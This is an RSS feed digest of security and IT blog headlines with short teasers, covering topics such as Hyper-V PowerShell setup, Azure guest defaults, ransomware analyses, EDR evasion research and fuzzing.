    In this second post in my series about Hyper-V management with PowerShell I will explain how to create a Hyper-V virtual switch with PowerShell. In my previous post I explained how to install Hyper-V with PowerShell. Virtual switch types Create a Hyper-V virtual switch with PowerShell first appeared on 4sysops.  ( 3 min )
  • Open

    A Primer on Neurodiversity in Cybersecurity
    No content preview  ( 7 min )

  • Open

    Guest who? Insecure Azure Defaults!
    Introduction Azure has an insecure default guest user setting, and your organization is probably using it. The default settings Azure provides would allow any user within the organization (including guest users) to invite guest users from any domain, bypassing any central identity management solutions (e.g. Okta, Auth0) and onboarding processes. Additionally, an attacker may use […] The post Guest who? Insecure Azure Defaults! appeared first on Praetorian.  ( 6 min )
  • Open

    LAPSUS$: Recent techniques, tactics and procedures
    This post describes the techniques, tactics and procedures we observed during recent LAPSUS$ incidents.  ( 5 min )
  • Open

    Cortex XSOAR Tips & Tricks – Execute Commands Using The API
    Introduction Every automated task in Cortex XSOAR relies on executing commands from integrations or automations either in a playbook or directly in the incident war room or playground. But what if you wanted to incorporate a command or automation from Cortex XSOAR into your own custom scripts? For that you can use the API. In … Continue reading Cortex XSOAR Tips & Tricks – Execute Commands Using The API →
  • Open

    Install Hyper-V with PowerShell
    In this first post of my series about managing Hyper-V with PowerShell I will outline how to install Hyper-V Server and the Hyper-V role with PowerShell. Install Hyper-V with PowerShell first appeared on 4sysops.  ( 3 min )
  • Open

    A Red Teamer’s Guide to Analyzing Propaganda, Part 1
    Korzybski to the rescue once again! In part 1, we look at how two-valued orientation can shape and constrain thinking.

  • Open

    LockBit Ransomware Side-loads Cobalt Strike Beacon with Legitimate VMware Utility
    Long-running LockBit ransomware attempts to evade Windows ETW, AMSI and EDR by leveraging legitimate VMware logging command line utility.  ( 8 min )
  • Open

    Confused by agents? We've cleaned up our jargon ...
    Speaking to Burp Suite Enterprise Edition users, one thing has come up time and time again as a blocker to your understanding of the product. This has been our use of the term "agent" when describing  ( 3 min )
    Burp Suite Enterprise Edition: config tips for scanning success
    Burp Suite Enterprise Edition is the dynamic web vulnerability scanner that can help you to secure your whole portfolio. To help you achieve that, this article contains some advice on how to optimize  ( 3 min )
  • Open

    SecureAuth Announces New Behavioral Modeling Patents to Fortify Passwordless Continuous Authentication
    Innovative Method of Biobehavioral Credentials Deliver Frictionless Authentication to Prevent Fraud using Dynamic Level of Assurance IRVINE, Calif. – April 25 2022 – SecureAuth, a leader in next-generation access management and authentication, announces that the United States Patent and Trademark Office (USPTO) granted the company four groundbreaking methods for authenticating users’ claimed identities for frictionless […] The post SecureAuth Announces New Behavioral Modeling Patents to Fortify Passwordless Continuous Authentication appeared first on SecureAuth.  ( 5 min )
  • Open

    Python module Paramiko for managing CISCO devices: Installation and usage example
    The Python module Paramiko enables you to leverage Python to automate the management of CISCO routers and switches. In this guide, I will explain how to install Paramiko via pip and provide a usage example. The module makes Python act as an SSH client or server, enabling us to automate any device to which we can connect via SSH. Python module Paramiko for managing CISCO devices: Installation and usage example first appeared on 4sysops.  ( 7 min )
  • Open

    4 Tips to Successfully Prepare for the SSAP Exam
    The SANS Security Awareness Professional (SSAP) is the world’s leading industry-recognized credential that signifies that the holder has the knowledge and expertise to build, maintain and measure a mature security awareness program.  ( 5 min )

  • Open

    Learning Machine Learning Part 2: Attacking White Box Models
    In the previous post, I went through a very brief overview of some machine learning concepts, talked about the Revoke-Obfuscation project…  ( 20 min )
  • Open

    CloudGoat goes Serverless: A walkthrough of Vulnerable Lambda Functions
    The post CloudGoat goes Serverless: A walkthrough of Vulnerable Lambda Functions appeared first on Rhino Security Labs.  ( 5 min )
  • Open

    Real World Cryptography Conference 2022
    The IACR’s annual Real World Cryptography (RWC) conference took place in Amsterdam a few weeks ago. It remains the best venue for highlights of cryptographic constructions and attacks for the real world. While the conference was fully remote last year, this year it was a 3-day hybrid event, live-streamed from a conference center in charming … Continue reading Real World Cryptography Conference 2022 →  ( 21 min )
  • Open

    Improving the state of go-fuzz
    By Christian Presa Schnell During my winternship, I used the findings from recent Go audits to make several improvements to go-fuzz, a coverage-based fuzzer for projects written in Go. I focused on three enhancements to improve the effectiveness of Go fuzzing campaigns and provide a better experience for users. I contributed to fixing type alias […]  ( 9 min )
  • Open

    Export and import passwords in Firefox
    Since version 80, Firefox has allowed you to import passwords in CSV format. This can be used, for example, to export passwords from Firefox and transfer them to another PC. If you format the data accordingly, you can also import them from other programs, such as password managers. Export and import passwords in Firefox first appeared on 4sysops.  ( 5 min )

  • Open

    Introduction to VirtualBox security research
    Introduction This article introduces VirtualBox research and explains how to build a coverage-based fuzzer, focusing on the emulated network device drivers. In the examples below, we explain how to create a harness for the non-default network device driver PCNet. The example can be readily adjusted for a different network driver or even different device driver components. We are aware that there are excellent resources related to this topic - see [1], [2]. However, these cover the fuzzing process from a high-level perspective or omit some important technical details. Our goal is to present all the necessary steps and code required to instrument and debug the latest stable version of VirtualBox (6.1.30 at the time of writing). As the SVN version is out-of-sync, we download the tarball inste…  ( 11 min )
  • Open

    Exodus Wants to help CISA Shields Up
    CISA Shields Up in response to looming Russian Cyberattacks, Exodus Intelligence wants to help The Cybersecurity and Infrastructure Security Agency (CISA) recently launched the #ShieldsUp Campaign to provide organizations resources and recommended actions to heighten their security posture in light of the Russian invasion of Ukraine.  Evolving intelligence indicates that the Russian Government is exploring ... Read more Exodus Wants to help CISA Shields Up The post Exodus Wants to help CISA Shields Up appeared first on Exodus Intelligence.  ( 1 min )
  • Open

    Passwordless authentication with FIDO2 and Azure Active Directory
    Getting rid of unsecure password authentication is becoming a priority for many businesses. Companies using Microsoft's Azure Active Directory have many options to implement passwordless authentication. One of these is using a FIDO2 security key. Passwordless authentication with FIDO2 and Azure Active Directory first appeared on 4sysops.  ( 6 min )
  • Open

    SecureAuth Latest Release Delivers Enhanced Passwordless Authentication with Improved User Experience
    Organizations Now Have the Ability to Use Common FIDO2 Experience Across Browsers, Conditional Passwordless, Hybrid and Cloud Deployment for Azure AD Support As we emerge from the pandemic, trends of digital transformation with a dispersed workforce and a complete restructuring of Information Technology (IT) and Operational Technology (OT) architecture accelerates the need for security and […] The post SecureAuth Latest Release Delivers Enhanced Passwordless Authentication with Improved User Experience appeared first on SecureAuth.  ( 4 min )

  • Open

    Which DFIR Summit Mascots do you want to see as Lego giveaways this year? Vote now!
    Join us this year at the 2022 SANS DFIR Summit Live Online or attend in Austin! If you’ve attended before, you know you’ll walk away from the summit with a story, connection, and maybe even one of those limited edition DFIR Mascot Legos. If it’s your first time attending, we look forward to meeting you at the most comprehensive DFIR event of the year!  ( 8 min )

  • Open

    Update: re-search.py Version 0.0.19
    This is a Python3 stdin fix for re-search.py, my tool to search with regular expressions. re-search_V0_0_19.zip (http)MD5: 4007A3E5540871221B55591B50E2239BSHA256: 263236ABE75B93F1F999474D690A9EB2575EBE42CED8F369FF98B349A5116D11  ( 3 min )
  • Open

    Bypassing PESieve and Moneta (The "easy" way....?)
    Table of Contents Introduction Moneta and the first IOC Moneta and the final IOC The PeSieve Bypass Conclusion TLDR; POC is here: https://github.com/waldo-irc/YouMayPasser/.  Usage isn't super straight forward but I'd rather it wasn't.  Good Luck! Introduction The title  ( 19 min )
  • Open

    Home-Grown Red Team: Bypassing Windows 11 Defenses With Covenant C2 and Nimcrypt2
    I know your question. Why would anybody want to use Covenant C2? It’s not supported, it’s outdated and everybody has moved on! Let’s at…  ( 4 min )

  • Open

    Writing an AWS Lambda function using Go (Golang)
    In my last article, titled "What is serverless computing? An introduction to AWS Lambda," we took a detailed look at what serverless computing does. Taking the next step, we will create a working example in AWS Lambda using the Go programming language (often referred to as Golang). Writing an AWS Lambda function using Go (Golang) first appeared on 4sysops.  ( 9 min )
  • Open

    Російсько-український конфлікт. Кіберресурсний центр
    Отримайте доступ до ресурсів, які допоможуть вашій організації орієнтуватися в кіберризиках, пов’язаних з російсько-українським конфліктом.  ( 8 min )

  • Open

    Infosec Salaries – the myth and the reality
    Every once in a while someone drops a salary bomb discussion on social media and the speculations follow. The salary bomb value du jour it is the mythical 450K USD […]  ( 6 min )
  • Open

    Home-Grown Red Team: Testing Common AV Evasion With PE Packers On Windows 11
    Bypassing AV solutions is essential for initial access, lateral movement and full domain compromise. Over the last couple of years, we’ve…  ( 4 min )
  • Open

    Yeah, It’s Tough but We’re Tougher
    Times are volatile, and everyone we encounter seems slightly on edge. In an environment like this, it’s no surprise that red teaming is tough. But that’s no excuse for us to throw up our hands. It just means we need to revisit our fundamental mission and work harder than ever to refine our red teaming methods and manners.
  • Open

    Nokoyawa Ransomware | New Karma/Nemty Variant Wears Thin Disguise
    Nemty developers have created a new, flawed update to the Karma ransomware variant in a bid to avoid detection and mislead attribution.  ( 7 min )
  • Open

    How Wix Improves Their Security Posture with Ethical Hackers
    Reducing risk is fundamental to Wix’s approach to cybersecurity, and as the threat landscape evolves, they turn to HackerOne Bounty to protect their security posture. Since 2018, Wix has invited tens of thousands of ethical hackers worldwide to ensure new and existing features are secure. We recently met with two Wix security team members to learn how they leverage ethical hackers to detect risks before they become threats and how vulnerability insights help strengthen their security posture.  ( 7 min )
2022-05-21T01:01:25.020Z osmosfeed 1.14.4